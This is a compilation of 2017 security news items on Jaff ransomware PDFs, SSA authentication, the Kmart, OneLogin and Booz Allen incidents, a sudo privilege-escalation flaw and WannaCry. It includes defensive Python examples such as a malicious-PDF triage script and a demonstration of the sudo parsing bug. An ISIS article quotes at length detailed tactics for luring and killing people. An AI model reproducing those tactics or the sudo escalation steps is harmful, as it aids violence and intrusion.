Decoy Files Found in PDFs Dropping Jaff Ransomware

1.6.2017 securityweek Ransomware
Spam campaigns distributing the Jaff ransomware have evolved and are using multiple decoy files hidden inside malicious PDF attachments, Trustwave security researchers say.

Jaff is a new ransomware family that emerged in early May, and has been distributed through the infamous Necurs spam botnet. After fueling a surge in malicious spam last year, Necurs went dark in December 2016, only to return in April 2017.

The Locky ransomware, historically associated with spam emails distributed by the Necurs botnet, went silent in December as well, and made only a brief return in April. As of early May, Necurs switched to distributing the Jaff ransomware and continues to do so.

The reason for this appears to be simple: Jaff was presumably developed by the same group behind Locky and Dridex, given its reuse of resources previously associated with those threats. The first Jaff variant even used a ransom note similar to Locky’s; the second variant adopted a redesigned note, along with a few other changes.

The distribution campaign uses PDF files attached to the spam emails, but with Word documents hidden inside. The email subject ranges from fake invoice notifications to fake payment receipts, and from alleged image scans to random file copies.

The ultimate goal remains the same: the Word document inside the PDF file is meant to download and drop a malware executable. According to Trustwave, however, the PDF campaigns have been evolving almost daily, with a larger number of embedded files discovered inside recent attachments and with additional layers of obfuscation.

“These additional files do nothing, and are probably just decoys. But the main .docm file, with its malicious macro, still acts as the malware downloader,” Trustwave’s Homer Pacag explains.

The PDF file contains JavaScript that calls exportDataObject with its launch flag set, which saves the embedded .docm file to disk and opens it in Word. Once the user enables macros, the document’s vbaProject macro downloads the Jaff ransomware from a specific URL.
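
The triage script below is an added example and is not Trustwave’s code or a Jaff sample. It scans a PDF’s raw bytes (inflating FlateDecode streams so indicators inside compressed objects are seen) for the chain the article describes: embedded files, JavaScript, an OpenAction, and an exportDataObject call whose nLaunch flag asks the reader to launch the attachment. The PDF skeleton, attachment names and decoy file are constructed for the example; the /Filespec, /EmbeddedFile and exportDataObject names are real PDF and Acrobat JavaScript vocabulary.

```python
import json
import re
import zlib

# Constructed sample, not a real Jaff dropper: a hand-written PDF skeleton that carries the
# artifacts Trustwave describes (an OpenAction JavaScript calling exportDataObject with
# nLaunch set, one embedded .docm, one do-nothing decoy attachment). Attachment names invented.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R
  /Names << /EmbeddedFiles << /Names [(NM_invoice_7364.docm) 5 0 R (readme.txt) 7 0 R] >> >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /JavaScript
  /JS (this.exportDataObject({ cName: "NM_invoice_7364.docm", nLaunch: 2 });) >> endobj
5 0 obj << /Type /Filespec /F (NM_invoice_7364.docm) /EF << /F 6 0 R >> >> endobj
6 0 obj << /Type /EmbeddedFile /Length 8 >> stream
PK\x03\x04docm
endstream endobj
7 0 obj << /Type /Filespec /F (readme.txt) /EF << /F 8 0 R >> >> endobj
8 0 obj << /Type /EmbeddedFile /Length 9 >> stream
decoyfile
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Attachment extensions that should never arrive inside a PDF from an unknown sender.
RISKY_EXT = {"doc", "docm", "docx", "xls", "xlsm", "xlsx", "rtf", "js", "vbs", "exe", "scr", "jar"}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
FILENAME_RE = re.compile(rb"/F\s*\(([^)]*)\)")
EXPORT_RE = re.compile(rb"exportDataObject\s*\(.*?nLaunch\s*:\s*(\d)", re.S)


def _searchable_bytes(data: bytes) -> bytes:
    """Raw file bytes plus every stream body, inflated when FlateDecode-compressed, so an
    indicator hidden in a compressed object is still visible to the regexes below."""
    views = [data]
    for m in STREAM_RE.finditer(data):
        body = m.group(1)
        try:
            views.append(zlib.decompress(body))
        except zlib.error:
            views.append(body)          # not a zlib stream (or an unsupported filter)
    return b"\n".join(views)


def scan_pdf(data: bytes) -> dict:
    """Static triage of one PDF: what is embedded, and is anything wired up to launch it?"""
    text = _searchable_bytes(data)
    names = sorted({n.decode("latin-1") for n in FILENAME_RE.findall(text)})
    export = EXPORT_RE.search(text)
    report = {
        "embedded_file_count": len(re.findall(rb"/Type\s*/EmbeddedFile\b", text)),
        "embedded_names": names,
        "risky_attachments": [n for n in names if n.rsplit(".", 1)[-1].lower() in RISKY_EXT],
        "has_javascript": bool(re.search(rb"/(JavaScript|JS)\b", text)),
        "has_openaction": b"/OpenAction" in text,
        # Acrobat's exportDataObject: nLaunch 0 = save only; 1 and 2 = save and then launch.
        "export_then_launch": export is not None and export.group(1) in (b"1", b"2"),
        "has_launch_action": bool(re.search(rb"/S\s*/Launch\b", text)),
    }
    if report["export_then_launch"] or report["has_launch_action"]:
        report["verdict"] = "suspicious: attachment is dropped and launched"
    elif report["risky_attachments"]:
        report["verdict"] = "review: office/script attachment embedded"
    else:
        report["verdict"] = "clean"
    return report


if __name__ == "__main__":
    print(json.dumps(scan_pdf(SAMPLE_PDF), indent=2))
```

This is a byte-level heuristic, which is what you want for a first pass over a mail queue, but it is not a parser: objects packed into /ObjStm object streams, hex-escaped names such as /J#53 or JavaScript split across string concatenations will slip past it, so treat a “clean” verdict as “nothing obvious” and hand anything with an embedded file to a real PDF parser.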

Over the past week or so, the Jaff variant being delivered via Necurs appends the .wlu extension to the encrypted files (the initial variant was using the .jaff extension). However, it continues to use the same URL to guide victims to where they can recover their encrypted files.


Social Security Administration Adopts What NIST is Deprecating

1.6.2017 securityweek Social
As of June 10, 2017, users of the Social Security Administration (SSA) website will be required to use two-factor authentication (2FA) to gain access. Potentially, this could affect a vast number of American adults, who will have to enter both their password and a separate one-time code sent to them by SMS or email.

What is surprising is that in July 2016, NIST deprecated SMS-based 2FA in special publication 800-63B: Draft Digital Identity Guidelines. It should be noted this is still a draft, and not yet a formal standard that government agencies are required to meet; but nevertheless, it specifically says, "OOB [2FA] using SMS is deprecated, and may no longer be allowed in future releases of this guidance." It seems strange, then, that the SSA should introduce precisely what NIST deprecates.

NIST has chosen to deprecate SMS because it is flawed, not merely because stronger alternatives exist. Publication 800-63B stresses, "Due to the risk that SMS messages may be intercepted or redirected, implementers of new systems SHOULD carefully consider alternative authenticators" (section 5.1.3.2). This is not a hypothetical risk. German newspaper Süddeutsche Zeitung reported on May 3, 2017 that criminals had used Signaling System No. 7 (SS7) attacks to redirect the one-time codes that banks send by SMS, bypassing two-factor authentication and making unauthorized wire transfers from victims' accounts.

SS7 is the signaling protocol suite that underpins the worldwide telephone network, fixed and mobile alike. Developed from 1975 on for a closed club of trusted carriers, it authenticates none of the messages that set up calls, deliver SMS and record a roaming subscriber's location; anyone with access to the SS7 network can therefore tell a carrier that a subscriber has roamed elsewhere and have that subscriber's text messages delivered to an attacker-controlled node. "It is full of flaws," explains Martin Zinaich, information security officer at the City of Tampa. "Most of those flaws are 'by design' to keep calls connected from tower to tower. It doesn’t make sense to utilize 2FA when that second factor is so easily breached." And it is unlikely that SS7 will ever be fixed.

The initial plan from the SSA had been to offer only SMS-based 2FA. "Last summer," explains Jim Borland, acting deputy commissioner for communications in a blog post early this month, "we added a second way for us to check your identity when you registered or signed in to my Social Security. However, at that time, we only allowed the use of a cell phone as your second identification method. We listened to your concerns, and beginning on June 10, you can choose either your cell phone or your email address as the second way for us to identify you. Since an email address is already required to use my Social Security, everyone can continue to benefit from the features my Social Security provides."

The problem was that many of the SSA's 30 million users did not have SMS-capable phones. "The initial rollback of last year's plan to use SMS messages as the sole means to receive a one-time passcode was done due to, primarily, a convenience issue, since most users of the SSA website were found to not have phones capable of receiving SMS messages," explains Nathan Wenzler, chief security strategist at consulting firm AsTech. "Some estimates suggested that up to two-thirds of users would be affected in this way."

But he continued, "Adding the option to receive an email does not add any additional security, either, as email accounts can also be compromised in many ways, allowing an attacker to intercept the one-time passcode sent to a user's inbox as well. Is the SSA meeting [current] policy requirements? Yes. Are they creating a more secure site for their users? Not really."

Chris Roberts, chief security architect at threat detection firm Acalvio is just as damning. "I won't sugarcoat this: of all of those that could be affected, seniors are the most wary of text messages, especially when so many damn scams come across as text messages these days. Therefore, this might not be the best solution. The fact that it's been proven several times that a text 2FA does little to help combat fraud means that there's still a lot that the SSA needs to do."

The SSA, however, is in a difficult position. It provides a necessary service to a large number of citizens, many of whom were born before the technology and internet revolution. Some have never adapted, but still rely on the SSA. In order to maintain its service to all its customers, it is forced to adopt the lowest common denominator for its 2FA. Normally, this would be SMS 2FA -- but for the SSA's particular range of customers, even that is too high. It supplemented SMS with email text. The result is simply a weak and vulnerable form of authentication, albeit stronger than passwords alone. "Using email as a way to verify Americans," comments Marc Boroditsky, VP and GM of Authy, "is, at best, misguided, and, at worst, a high-risk attack vector for massive fraud."

Could it have done better? Yes, says Boroditsky. "Even if someone's phone number isn't text-enabled, you can still do phone number verification or 2FA over a simple voice call to that person. And with regard to 'technical complexity' of 2FA, this should be really straightforward. I've seen developers build a verification app in 5 minutes that works with nearly every phone on the planet."

But flawed 2FA is not the only SSA departure from NIST's draft guidelines. NIST takes the view that password length is more important than password complexity. "Since the size of a hashed password is independent of its length, there is no reason not to permit the use of lengthy passwords (or pass phrases) if the user wishes." This allows the user to use a phrase based on, for example, a favorite line of poetry: easy for the user to remember, hard for the criminal to crack. "Allow at least 64 characters in length to support the use of passphrases," recommends NIST. "Encourage users to make memorized secrets as lengthy as they want, using any characters they like (including spaces), thus aiding memorization." But the SSA website currently accepts passwords of between only 7 and 20 characters.
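
As an added example, not code from the article, NIST or the SSA, the checker below encodes the two length rules side by side: the draft SP 800-63B guidance quoted above (at least 8 characters, at least 64 permitted, spaces and any character allowed, screened against known-breached passwords) and the 7-to-20-character rule the article attributes to the SSA site. The breached-password set is a constructed stand-in; a real deployment loads a corpus. The example also applies NFKC normalization before measuring length, which the NIST draft requires so that the same passphrase typed through different input methods compares and hashes identically.

```python
import unicodedata

# Policy dictionaries. NIST_DRAFT paraphrases the SP 800-63B draft rules quoted in the article;
# SSA_SITE models only what the article states about the SSA site (7 to 20 characters).
# Neither dict is an official artifact of either organization.
NIST_DRAFT = {"min_len": 8, "max_len": 64, "check_breached": True}
SSA_SITE = {"min_len": 7, "max_len": 20, "check_breached": False}

# Constructed stand-in for a breached-password corpus; a real deployment loads one from a
# breach dataset rather than hard-coding a handful of entries.
BREACHED = {"password", "123456", "qwerty", "letmein", "welcome1", "socialsecurity"}


def evaluate(secret: str, policy: dict) -> list:
    """Return the reasons a memorized secret is rejected under `policy`; [] means accepted."""
    # NIST: normalize (NFKC) before measuring or hashing so length is stable across input methods.
    secret = unicodedata.normalize("NFKC", secret)
    reasons = []
    if len(secret) < policy["min_len"]:
        reasons.append(f"shorter than {policy['min_len']} characters")
    if len(secret) > policy["max_len"]:
        reasons.append(f"longer than {policy['max_len']} characters")
    # No composition rules: NIST says length and a breach screen beat forced character classes.
    if policy["check_breached"] and secret.casefold() in BREACHED:
        reasons.append("found in breached-password list")
    return reasons


def compare(secret: str) -> dict:
    """Evaluate one secret under both policies to see where they diverge."""
    return {"nist_draft": evaluate(secret, NIST_DRAFT), "ssa_site": evaluate(secret, SSA_SITE)}


if __name__ == "__main__":
    for candidate in ("the quality of mercy is not strained", "Tr0ub4d&3", "Password", "pass"):
        print(repr(candidate), compare(candidate))
```

The divergence is the point: a 36-character line of verse passes the NIST rules and is rejected by the 20-character cap, while a 9-character string with mixed classes passes both and a common breached password passes the length rules and fails only the breach screen.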

If NIST's draft guidelines become reality unchanged, the SSA will have much to do. It will know this. It might be expecting an exemption; or the current changes might simply be a holding exercise while it develops a better system more in line with NIST's expectations. What other factors could the SSA adopt? Tom Conklin, Sr. director of security & compliance at Vera, comments, "That's a challenge because nothing is perfect, not everyone has a cell phone, email can be compromised, and private keys can be stolen. One approach would be for the Social Security Administration to adopt an open standard like FIDO universal second factor. This way anyone with a FIDO compatible device or app could use it with the Social Security website."


Kmart Payment Systems Infected With Malware

1.6.2017 securityweek Virus
Big box department store chain Kmart informed customers on Wednesday that cybercriminals may have stolen their credit or debit card data after installing malware on the company’s payment processing systems.

Kmart, a subsidiary of Sears Holdings, has not provided any information on which stores are affected and for how long hackers had access to its systems. The retailer operates more than 700 stores, but blogger Brian Krebs learned from his sources in the financial industry that the breach does not appear to impact all locations.

It’s unclear what point-of-sale (PoS) malware has been used in the attack, but the retailer has described it as “a new form of malware” and “undetectable by current antivirus systems.”

The company’s investigation showed that names, addresses, social security numbers, dates of birth, email addresses and other personally identifiable information (PII) have not been compromised. Kmart believes the attackers may have only accessed payment card numbers.

“All Kmart stores were EMV ‘Chip and Pin’ technology enabled during the time that the breach occurred, and we believe the exposure to cardholder data that can be used to create counterfeit cards is limited,” said Gareth Glynne, senior VP of retail operations at Sears & Kmart. “There is no evidence that kmart.com or Sears customers were impacted nor that debit PIN numbers were compromised.”

Kmart is working with law enforcement authorities, banking partners and cyber security firms to investigate the incident. The retailer is not offering any credit monitoring services to affected customers given that only limited information has been exposed, but it has advised them to review and monitor their payment card statements.

This is not the first time Kmart has disclosed a data breach. In October 2014, the company told customers that their credit and debit card data may have been stolen after hackers installed malware on its payment systems.

In both incidents, the company described the malware as being “undetectable by current antivirus systems” and in both cases it claimed that only card numbers were compromised. Kmart said the latest breach does not appear to be linked to a previous incident.

“I think the single most important piece of information that we know so far is that this could have been much, much worse,” said Richard Henderson, global security strategist at Absolute. “If KMart did not have EMV-enabled terminals in their stores, forcing customers with chip cards to swipe their stripe, then the impact may have been substantially larger. It's critical that we continue the slow march in the US to full EMV adoption. While EMV is by no means infallible, it is leagues better than the ancient mag stripe technology that continues to be exploited by attackers on a regular basis."


High-Severity Linux Sudo Flaw Allows Users to Gain Root Privileges
1.6.2017 thehackernews Vulnerability
A high-severity vulnerability has been reported in sudo on Linux that could be exploited by a low-privileged local attacker to gain full root access on an affected system.
The vulnerability, identified as CVE-2017-1000367, was discovered by researchers at Qualys Security in sudo's "get_process_ttyname()" function for Linux. It allows a local user who is permitted to run some command via sudo to run commands as root or otherwise escalate to root.
Sudo, short for "superuser do," is a program for Linux and UNIX operating systems that lets standard users run specific commands as the superuser (root), such as adding users or performing system updates.
The flaw resides in the way sudo parses "tty" information from the process status file in the proc filesystem.
On Linux machines, sudo parses the /proc/[pid]/stat file in order to determine the device number of the process's tty from field 7 (tty_nr), Qualys Security explains in its advisory.
Although the fields in the file are space-delimited, field 2 (the command name) can itself contain whitespace, including a newline, which sudo did not account for.
Therefore, a local user with sudo privileges (a sudoer) on an SELinux-enabled system can make sudo use a device number of his choosing by creating a symbolic link to the sudo binary whose name contains a space followed by a number, and from there escalate to overwrite any file on the filesystem, including root-owned files.
"To exploit the bug, the user can choose a device number that does not currently exist under /dev. If sudo does not find the terminal under the /dev/pts directory, it performs a breadth-first search of /dev...The attacker may then create a symbolic link to the newly-created device in a world-writable directory under /dev, such as /dev/shm," an alert on the sudo project website reads.
"This file will be used as the command's standard input, output and error when an SELinux role is specified on the sudo command line. If the symbolic link under /dev/shm is replaced with a link to another file before [sudo opens it], it is possible to overwrite an arbitrary file by writing to the standard output or standard error. This can be escalated to full root access by rewriting a trusted file such as /etc/shadow or even /etc/sudoers."
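
The two parsers below are an added example, not sudo's code or Qualys' exploit, that isolates the parsing mistake the advisory describes: a /proc/[pid]/stat line is split on whitespace and field 7 taken blindly, versus anchoring on the last ')' that closes the command name (the only field that can contain whitespace) and counting from there. The stat lines are constructed; the second one's command name is the 15-byte string an attacker gets by running sudo through a symlink named "a b c d e 65535". The strtol look-alike mimics C's prefix parsing, which is what turns "65535)" into 65535.

```python
import re

# Constructed /proc/<pid>/stat lines, cut down to the first ten fields. In both, field 7
# (tty_nr) is 34816: major 136, minor 0, i.e. /dev/pts/0. In the second line the command
# name in field 2 is "a b c d e 65535", 15 bytes (the kernel's comm limit), which an attacker
# gets by running sudo through a symlink of that name.
BENIGN_STAT = "4242 (sudo) S 4100 4242 4242 34816 4242 4194560 0"
MALICIOUS_STAT = "4242 (a b c d e 65535) S 4100 4242 4242 34816 4242 4194560 0"


def _strtol(token: str) -> int:
    """Mimic C strtol(): take the leading integer and ignore whatever follows, e.g. a ')'."""
    m = re.match(r"\s*[-+]?\d+", token)
    return int(m.group()) if m else 0


def tty_nr_naive(stat: str) -> int:
    """The vulnerable pattern: split on whitespace and take the 7th field. Any space, tab or
    newline inside the command name shifts the later fields, so the attacker picks field 7."""
    return _strtol(stat.split()[6])


def tty_nr_safe(stat: str) -> int:
    """The robust pattern: the command name is the only field that may contain whitespace or
    ')', and every field after it is numeric, so anchor on the LAST ')' and count from there:
    state, ppid, pgrp, session, tty_nr."""
    _, closing, tail = stat.rpartition(")")
    if not closing:
        raise ValueError("malformed stat line: no ')' closing the command name")
    return int(tail.split()[4])


def decode_tty_nr(tty_nr: int) -> tuple:
    """Split tty_nr into (major, minor): major is bits 15..8, minor is bits 7..0 plus 31..20."""
    major = (tty_nr >> 8) & 0xFF
    minor = (tty_nr & 0xFF) | ((tty_nr >> 12) & 0xFFF00)
    return major, minor


if __name__ == "__main__":
    for line in (BENIGN_STAT, MALICIOUS_STAT):
        print(f"naive={tty_nr_naive(line)} {decode_tty_nr(tty_nr_naive(line))}  "
              f"safe={tty_nr_safe(line)} {decode_tty_nr(tty_nr_safe(line))}")
```

On the benign line both parsers agree on 34816 (/dev/pts/0). On the crafted line the naive parser returns 65535, a device with major 255 and minor 255 that does not exist under /dev, which is exactly the precondition the sudo alert above describes for the /dev/shm symlink trick; the anchored parser still returns 34816. The same split-on-whitespace mistake shows up in monitoring agents and container tooling that read /proc, so it is worth grepping your own code for `split()[6]`-style access to stat fields.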
The vulnerability, which affects sudo 1.8.6p7 through 1.8.20 and is rated high severity, has been patched in sudo 1.8.20p1, and users are advised to update to the latest release.
Red Hat yesterday pushed out patches for Red Hat Enterprise Linux 6, Red Hat Enterprise Linux 7, and Red Hat Enterprise Linux Server. Debian has also released fixes for its Wheezy, Jessie and Sid releases and SUSE Linux has rolled out fixes for a number of its products.
Qualys Security said it would publish its Sudoer-to-root exploit once a maximum number of users have had time to patch their systems against the flaw.


OneLogin Investigating Breach at U.S. Data Center

1.6.2017 securityweek Incident
Identity and access management solutions provider OneLogin informed customers on Wednesday that it had detected unauthorized access at its U.S. data center.

OneLogin CISO Alvaro Hoyos said the breach was detected on May 31 and blocked the same day. Law enforcement has been notified and an independent security firm has been called in to assess the impact and cause of the intrusion.

While Hoyos’ statement contains few details, the emails sent to affected customers reveal that all users served by the company’s U.S. data center are impacted and may have had their information compromised.

OneLogin said it can’t provide additional information on the incident due to the ongoing law enforcement investigation, but a support page made available to customers mentions that the exposed information can be used to decrypt encrypted data.

The company, whose services are used by more than 2,000 enterprises in 44 countries, is requiring affected customers to force a OneLogin directory password reset for all their users, generate new certificates for apps that use SAML SSO, generate new API credentials and OAuth tokens, and generate new directory tokens for Active Directory and LDAP connectors.

The list of required actions also includes updating credentials for third-party apps such as G Suite and Workday, generating new Desktop SSO tokens, recycling any secrets stored in Secure Notes, updating credentials for third-party app provisioning, updating admin credentials for apps that use form-based authentication, replacing RADIUS shared secrets, and instructing end-users to update their passwords for form-based authentication apps.

The long list of instructions for IT teams suggests that this was a significant breach that could have serious consequences.

The incident comes less than a year after OneLogin admitted that hackers gained access to Secure Notes data after stealing an employee’s password.

Secure Notes are normally protected using multiple levels of AES-256 encryption, but a bug caused the data to be visible in clear text in the company’s log management system, to which attackers had access for several weeks.


U.S. Defense Contractor Exposes Sensitive Military Data

1.6.2017 securityweek BigBrothers

Sensitive data belonging to the U.S. National Geospatial-Intelligence Agency (NGA) was left exposed on the Internet by defense and intelligence contractor Booz Allen Hamilton, a security firm revealed on Wednesday.

The NGA is a combat support and intelligence agency working under the Department of Defense. The geospatial intelligence provided by the organization is used by policymakers, the military, intelligence professionals and first responders.

Chris Vickery, a researcher who in the past identified billions of records exposed online due to weak configurations, discovered an unprotected Amazon S3 bucket containing tens of thousands of potentially sensitive files. Accessing the files did not require a password and all data was stored in clear text.

The data, belonging to the NGA, was connected – based on domain registration details and credentials – to Booz Allen Hamilton and another one of the agency’s contractors, Metronome. The files, some of which were marked as “top secret,” included military information, SSH keys belonging to a Booz Allen engineer, and admin credentials for a system housed by one of the contractor’s data centers.

Vickery, who recently joined cyber resilience firm UpGuard as a risk analyst, found the files on May 22 and notified Booz Allen two days later. After receiving no response from the company, Vickery alerted the NGA directly on May 25, and the exposed repository was secured within minutes. An unnamed government regulatory agency has asked UpGuard to hold on to the data.

The NGA said it immediately revoked affected credentials, but described the exposed files as “sensitive but unclassified information.” Booz Allen also claimed there was no evidence that any classified information or systems were exposed.

This is not the first time Vickery has discovered a data leak involving Booz Allen Hamilton. In late 2016, he reported that one of the company’s subcontractors, Potomac Healthcare Solutions, had leaked military healthcare worker data.

The intelligence contractor itself was involved in several security incidents in the past years, including a 2011 attack by Anonymous hacktivists, the Edward Snowden leaks, and the alleged theft of classified material by Harold Thomas Martin III.

The findings of Vickery and other researchers over the past years have demonstrated the risks posed by misconfigured AWS S3 buckets, but many organizations still fail to protect data stored in the cloud.

"AWS S3 is a very popular cloud based object storage service, and a staple of most AWS environments from the earliest days of the cloud service. Yet security of S3 buckets to prevent accidental data exposure is often poorly understood and badly implemented by their users, even someone as technically savvy as an engineer with one of the world’s leading defense contractors,” explained Zohar Alon, Co-Founder and CEO of Dome9.

“This type of oversight exemplifies the one-strike law for security in the public cloud. A single vulnerability, or security, or process lapse is all it takes to expose highly sensitive private data to the world and get data-jacked. Even with strict security controls in place, breaches such as this still occur due to very basic process failures, leaving extraordinarily sensitive information exposed to the world," Alon added.


ISIS Publishes Detailed Guide on How to Use Services Like Craigslist to Lure Non-Believers to Their Death
1.6.2017 securityweek Cyber 

ISIS has released a detailed guide on how to murder non-believers. The tutorial provides advice on how to lure targets via fake ads on websites such as Craigslist, Gumtree and eBay in order to kill them. The current installment of ISIS’ English-language propaganda magazine Rumiyah explains how to take hostages and murder large numbers of people.

The magazine also suggests posting fake employment ads as another means of luring victims to their demise.

“After garnering a significant amount of applicants, one can then arrange the ‘job interview’ location and times, spacing out the applicants’ appointment times so as to give oneself time to subdue each target as he arrives — luring him to an appropriate location before attacking, subduing, binding and then slaughtering them.”

Alternatively, according to the magazine, falsely advertising an apartment for rent can also achieve the desired result:

“‘The advertisement should be for a small single-room or studio apartment,’ the article states.

ISIS guide

‘This will help ensure that the viewer comes alone.’

The article is so detailed that it suggests followers dedicate a room for the ‘disposal of bodies … for the obvious reason of not alerting those intended victims entering the property after them’, and that they buy a ‘bat or small club’ to beat the victim over the head with before slaughtering them with a ‘strong, sharp knife’.

‘Additionally, carrying out this type of operation in the daytime hours will also help in this regard as it allows one to exploit the noise pollution that comes with the movement of people during those hours to drown out any sounds that may be heard as a consequence of one’s attacks,’ the article states.”

Rumiyah gives the reader a green light, ensuring that luring a non-believer, under false pretenses, in an effort to murder them is “divinely approved” by Allah.

Large-scale terrorist attacks are advocated by the magazine, which states that “the scenario for such an attack is that one assaults a busy, public and enclosed location and rounds up the kuffar (non-Muslims) who are present.”

It goes on to say:

“Having gained control over the victims, one should then proceed to slaughter as many of them as he possibly can before the initial police response.”

“Ideal target locations for hostage-taking scenarios include nightclubs, movie theatres, busy shopping malls and large stores, popular restaurants, concert halls, university campuses, public swimming pools, indoor ice-skating rinks, and generally any busy enclosed area, as such an environment allows for one to take control of the situation by rounding up the kuffar present inside and allows one to massacre them while using the building as a natural defence against any responding force attempting to enter and bring the operation to a quick halt.”

“Similarly, characteristics of a good target location include low light conditions, as it grants one the ability to manoeuvre between the people, taking advantage of the confusion and killing as many of the kuffar as physically possible.”

Rumiyah also suggests that if an ISIS soldier is unable to obtain a gun legally, they can always ram-raid hunting or military stores in order to acquire a firearm. Rumiyah indicates that the objective of taking hostages in “lands of disbelief”, such as Australia and the U.S., is to “create as much carnage and terror as one possibly can until Allah decrees his appointed time and the enemies of Allah storm his location or succeed in killing him.”

One of the main purposes of terrorist groups using the Internet is recruitment. On Tuesday, a former Guantanamo Bay inmate was detained in Bordeaux, France as part of a terror crackdown. Sabir Mahfouz Lahmar was one of six suspects arrested for allegedly being part of a French ISIS recruiting network. But this is not Lahmar’s first go-round with the system: he was freed from Gitmo in 2009 after France agreed to accept him. Lahmar was one of six Algerians detained in Bosnia in 2001 on suspicion of plotting to bomb the US embassy in Sarajevo.

So, what’s being done about the continued proliferation of terrorist activity online? Last Friday, world leaders agreed to ramp up the heat on social media giants, in response to the backlash against the spread of online terrorism. According to The Mirror:

“The G7 group issued an unprecedented order telling Internet outfits like Google, Facebook and Twitter to ‘act urgently’ in developing new tools to block violent content.”

The joint statement represented a significant win for Theresa May at her first G7 summit. The PM has led the charge against online terror, first as Home Secretary and then as Prime Minister – and now has other world leaders on her side.

British officials said US President Donald Trump and new French President Emmanuel Macron proved key allies at the summit in Sicily, pressing other leaders to back the plan.”

The G7’s joint statement:

“The internet has proven to be a powerful tool for terrorist purposes. The G7 calls for communication service providers and social media companies to substantially increase their effort to address terrorist content.”

“We encourage the industry to act urgently in developing and sharing new technology and tools to improve the automatic detection of content promoting incitement to violence. And we commit to supporting industry efforts in this vein including the proposed industry-led forum for combating online extremism.”

Demanding that businesses take certain measures in order to help fight terrorism has not always been well-received by businesses. And, there’s always the issue of infringing on civil liberties, so the future of the G7’s plan is uncertain.

The U.S. military, however, has shown some improvement in countering the digital operations of ISIS.

According to Lt. Gen. Paul Nakasone, commanding general of Army Cyber Command, over the past six months, a lot of progress has been made. “I think what we are learning is in terms of being able to counter a message, being able to attack a brand — in this case, the brand of ISIS — and then, the other thing is, how do we do this with the speed and accuracy that is able to get at an adversary that six months ago was moving uncontested in cyberspace,” he said at a Senate Armed Services subcommittee hearing. “I think we’ve learned those things over the last six months. I think we as a department have done much better.”

It appears the U.S. Army has thrown down the gauntlet:

“Quite simply, ISIS is no longer uncontested in cyberspace, and that’s a change,” said U.S. Army Cyber Command spokesman Charlie Stadtlander. “[Joint Task Force Ares] has demonstrated the value to the Joint Force that cyber can be a meaningful contribution to an overall military mission.”

But, the lingering question, as to who in government is best suited to counter information operations, remains an unsolved mystery on Capitol Hill.

NSA Director and U.S. Cyber Command head Adm. Michael Rogers admitted during a recent hearing that U.S. Cyber Command is not “optimized” to combat information operations launched by foreign powers.

“It right now is not in our defined set of responsibilities per say,” Rogers said. “I would be the first to admit that [information warfare] is not what our workforce is optimized for … we are certainly not where we”


Top Defense contractor left Pentagon docs unsecured on Amazon server
1.6.2017 securityweek BigBrothers

A top defense contractor left tens of thousands of sensitive Pentagon documents on an Amazon server without any protection in place.
The popular security expert Chris Vickery discovered more than 60,000 sensitive files belonging to a US military project for the National Geospatial-Intelligence Agency (NGA) left on an Amazon cloud storage server without authentication.

The documents were reportedly left unsecured on a public Amazon server by one of the nation’s top intelligence and defense contractors.

The files contain passwords to a US government system containing sensitive information and the security credentials of a senior employee of the top defense contractor Booz Allen Hamilton.

Vickery discovered the documents included login credentials for code repositories that could contain classified files and other credentials.

Digging into the 28GB archive, the expert discovered the private Secure Shell (SSH) keys of a Booz Allen employee, and half a dozen plain text passwords belonging to government contractors with Top Secret Facility Clearance.

“A cache of more than 60,000 files was discovered last week on a publicly accessible Amazon server, including passwords to a US government system containing sensitive information, and the security credentials of a lead senior engineer at Booz Allen Hamilton, one of the nation’s top intelligence and defense contractors,” reported Gizmodo.com. “What’s more, the roughly 28GB of data contained at least a half dozen unencrypted passwords belonging to government contractors with Top Secret Facility Clearance.”

The most disconcerting part of the discovery is that the exposed data even contained master credentials granting administrative access to a highly-protected Pentagon system.

Defense contractor data leak

The files are no longer available online, but someone could have downloaded those sensitive documents in the meantime, with serious consequences for US intelligence.

On May 24, Vickery first tried to notify Booz Allen Hamilton’s Chief Information Security Officer (CISO) of the leak.

“In short, information that would ordinarily require a Top Secret-level security clearance from the DoD was accessible to anyone looking in the right place; no hacking was required to gain credentials needed for potentially accessing materials of a high classification level,” wrote Dan O’Sullivan, Cyber Resilience Analyst at UpGuard.

Booz Allen promptly launched an investigation into the data leak.

“Booz Allen takes any allegation of a data breach very seriously, and promptly began an investigation into the accessibility of certain security keys in a cloud environment,” a Booz Allen spokesman told Gizmodo. “We secured those keys, and are continuing with a detailed forensic investigation. As of now, we have found no evidence that any classified information has been compromised as a result of this matter.”

The National Geospatial-Intelligence Agency (NGA), which in March awarded Booz Allen an $86 million defense contract, is also conducting a forensic investigation into the incident.

“We immediately revoked the affected credentials when we first learned of the potential vulnerability,” the NGA said in a statement. “NGA assesses its cyber security protections and procedures constantly with all of its industry partners. For an incident such as this, we will closely evaluate the situation before determining an appropriate course of action.”

Chris Vickery has discovered many other notable cases of open databases exposed on the Internet.

In December 2015 the security expert discovered 191 million records belonging to US voters online. In April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details of at least 200,000 IndyCar racing fans.

Vickery also disclosed a massive data breach at a U.S.-based data warehouse, Schoolzilla, which held personal information on more than a million American students (K-12).



WannaCry mistakes that can help you restore files after infection
1.6.2017 Kaspersky Ransomware  

Sometimes ransomware developers make mistakes in their code. These mistakes could help victims regain access to their original files after a ransomware infection. This article is a short description of several errors made by the WannaCry ransomware developers.

Errors in file removal logic

When WannaCry encrypts its victim’s files, it reads from the original file, encrypts the content and saves it into a file with the extension “.WNCRYT”. After encryption it renames “.WNCRYT” to “.WNCRY” and deletes the original file. This deletion logic varies depending on the location and properties of the victim’s files.

The files are located on the system drive:

If the file is in an ‘important’ folder (from the malware developers’ point of view – e.g. Desktop and Documents), then the original file will be overwritten with random data before removal. In this case, unfortunately, there is no way to restore the original file content.

